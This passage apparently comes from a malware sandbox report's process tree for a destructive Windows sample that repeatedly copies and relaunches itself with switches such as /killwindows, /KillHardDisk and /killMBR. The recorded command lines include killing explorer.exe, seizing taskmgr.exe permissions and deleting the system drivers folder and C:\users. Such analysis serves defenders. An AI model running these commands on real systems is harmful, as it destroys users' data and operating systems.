        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe 1697996445
        5⤵
        Executes dropped EXE
        
        PID:5052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /protect 1697996445
        6⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:1844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe+4306.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe
        8⤵
        
        PID:5320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe 1697996445
        8⤵
        
        PID:5780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe+729543.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        8⤵
        
        PID:5532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe 1697996445
        8⤵
        
        PID:7984
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:9384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /autoup 1697996445
        10⤵
        
        PID:7408
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /autoup 1697996445
        11⤵
        
        PID:6184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killwindows 1697996445
        10⤵
        
        PID:9400
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killwindows 1697996445
        11⤵
        
        PID:10928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /KillHardDisk 1697996445
        10⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /KillHardDisk 1697996445
        11⤵
        
        PID:7020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killMBR 1697996445
        10⤵
        
        PID:9472
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killMBR 1697996445
        11⤵
        
        PID:7644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /protect 1697996445
        10⤵
        
        PID:10816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /autoup 1697996445
        10⤵
        
        PID:10316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /save 1697996445
        6⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /protect 1697996445
        6⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:5956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe+710532.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        8⤵
        
        PID:7128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe 1697996445
        8⤵
        
        PID:7376
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:9392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:11020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:10364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /autoup 1697996445
        10⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /autoup 1697996445
        11⤵
        
        PID:1296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killwindows 1697996445
        10⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killwindows 1697996445
        11⤵
        
        PID:6584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:2560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del /q C:\windows\system32\drivers
        12⤵
        
        PID:4684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /KillHardDisk 1697996445
        10⤵
        
        PID:10704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killMBR 1697996445
        10⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /killMBR 1697996445
        11⤵
        
        PID:7980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe /protect 1697996445
        10⤵
        
        PID:5208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe+812482.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe
        8⤵
        
        PID:9740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe 1697996445
        8⤵
        
        PID:7652
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe 1697996445
        9⤵
        
        PID:4832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:10412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:2188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe /autoup 1697996445
        10⤵
        
        PID:5952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe /killwindows 1697996445
        10⤵
        
        PID:10804
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe /killwindows 1697996445
        11⤵
        
        PID:6284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe /KillHardDisk 1697996445
        10⤵
        
        PID:9352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe /killMBR 1697996445
        10⤵
        
        PID:9352
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /save 1697996445
        6⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:3312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:5988
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:6780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3392
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+51351.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
      4⤵
      PID:4324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+65982.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
      4⤵
      PID:4820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe 1697996445
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
    3⤵
    PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  PID:4060
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
    3⤵
    PID:4916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+4829.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
      4⤵
      PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe 1697996445
      4⤵
      PID:4868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+217762.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
      4⤵
      PID:5268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe 1697996445
      4⤵
      PID:5848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  PID:4352
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
    3⤵
    PID:4072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+4306.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
      4⤵
      PID:5504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe 1697996445
      4⤵
      PID:1560
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe 1697996445
        5⤵
        Executes dropped EXE
        
        PID:6104
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /protect 1697996445
        6⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:9260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe+916575.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe
        8⤵
        
        PID:7420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe 1697996445
        8⤵
        
        PID:10896
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe 1697996445
        9⤵
        
        PID:10604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4268
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:4288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /autoup 1697996445
        10⤵
        
        PID:2864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /killwindows 1697996445
        10⤵
        
        PID:9220
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /killwindows 1697996445
        11⤵
        
        PID:8440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /KillHardDisk 1697996445
        10⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /KillHardDisk 1697996445
        11⤵
        
        PID:11212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d049.exe /killMBR 1697996445
        10⤵
        
        PID:9116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe+424126.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe
        8⤵
        
        PID:3332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /save 1697996445
        6⤵
        
        PID:8800
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /save 1697996445
        7⤵
        
        PID:3840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:10828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:1412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+729543.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe
      4⤵
      PID:6492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe 1697996445
      4⤵
      PID:5656
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe 1697996445
        5⤵
        
        PID:10420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:9364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:8800
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /autoup 1697996445
        6⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /autoup 1697996445
        7⤵
        
        PID:4348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /killwindows 1697996445
        6⤵
        
        PID:10836
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /killwindows 1697996445
        7⤵
        
        PID:8312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:11780
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:704
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /KillHardDisk 1697996445
        6⤵
        
        PID:8756
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /KillHardDisk 1697996445
        7⤵
        
        PID:8540
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0642.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0642.exe 1697996445
        8⤵
        
        PID:8820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:12096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /killMBR 1697996445
        6⤵
        
        PID:8876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /protect 1697996445
        6⤵
        
        PID:1760
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe /killMBR 1697996445
        6⤵
        
        PID:9992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
  2⤵
  PID:5600
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
    3⤵
    PID:5712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  PID:5384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:5344
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:6464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /autoup 1697996445
  2⤵
  PID:9312
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /autoup 1697996445
    3⤵
    PID:8252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /killwindows 1697996445
  2⤵
  PID:5344
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /killwindows 1697996445
    3⤵
    PID:10864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:10364
  - - C:\Windows\system32\cmd.exe
